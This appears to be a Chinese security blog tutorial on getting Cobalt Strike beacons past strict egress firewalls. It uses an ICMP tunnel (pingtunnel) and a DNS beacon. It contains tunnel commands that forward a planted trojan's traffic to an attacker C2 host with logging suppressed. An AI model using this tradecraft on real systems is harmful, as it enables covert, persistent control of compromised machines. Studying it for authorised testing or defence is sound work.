概述
当我们通过 Web 拿下目标系统权限后,都希望能将目标上线到 CS、MSF 等 C2,便于控制和后渗透操作。
但是如果目标防火墙对内网设备出网流量限制严格,那我们就没法在 C2 上随意设置端口使目标上线。
那咋办?隧道又得上场喽!
操练起来
环境
首先在 Kali 上启动 CS 服务端
然后启动 CS 客户端并创建监听 1
CS 监听器 1 主要是用于生成木马,注意回连地址是目标本地!这里直接填的是 127.0.0.1,如果生成的木马回连地址是攻击机的地址,那么在 TCP 连接被限制的情况下肯定是上不了线的,如果设置回连地址是目标主机自己,那么这个连接就不会被防火墙限制。
将监听器 1 生成的木马上传到被攻击目标系统
最终这个监听器产生的木马在目标系统上运行后就会向目标本地的 6666 端口发送数据。
再创建一个 CS 监听 2
CS 监听器 2 主要是用于监听内网被攻击目标系统通过 ICMP 隧道发过来的数据,监听端口为 7777 端口。
将 pingtunnel 的服务端上传到 Kali 中
由于完成 CS 上线操作我们用的 Kali,所以这里 pingtunnel 服务端我们也是使用 Kali。
pingtunnel 基本玩法在这里:
ICMP居然还能用来搭建隧道 | 不会挖隧道的渗透测试工程师不是好吗喽
开启 pingtunnel 的服务端(kali)
./pingtunnel -type server将 pingtunnel 客户端上传到被攻击目标系统并运行客户端
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.49.139 -t 192.168.49.139:7777 -tcp 1 -noprint 1 -nolog 1客户端本地监听 6666 端口 ,将监听到的数据通过 icmp 隧道发送到 CS 的 192.168.49.139:7777 端口,并且不打印详细日志信息。
然后运行我们前面上传到客户端的木马,运行完就可以去 CS 上查看是否成功上线了。
此时攻击方和被攻击方是通过防火墙允许通过的 ICMP 传递数据的。
环境
公网服务器启动 CS 服务端,并且放行 TCP 的 50050 端口
攻击机(Win)启动 CS 客户端
在客户端创建监听(域名一定要填对,NS 记录的域名)
关于这一块的配置可以看看上一篇文章:
王炸组合 | 内网渗透隧道技术!DNS+FRP如何绕过防护干进内网
根据被攻击目标系统实际情况在客户端正常生成木马
这里是 Windows 木马,注意 DNS 的方式不支持 64 位
将木马放入目标系统,运行木马等待上线......等亿等......等亿等......
刚上线是黑的,需要输入命令激活
输入以下命令激活目标
checkin
最终效果
欧克,上线成功!
只要思想不滑坡,办法总比困难多。
关注、点赞、转发、在看一键四连,感谢支持
实操工具和环境在前面文章都有,需要可以看看
END
往期精彩回顾
原文始发于微信公众号(大伯为安全):目标网络限制严格CS拿不到权限怎么办?试试这个高级玩法—隧道上线
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论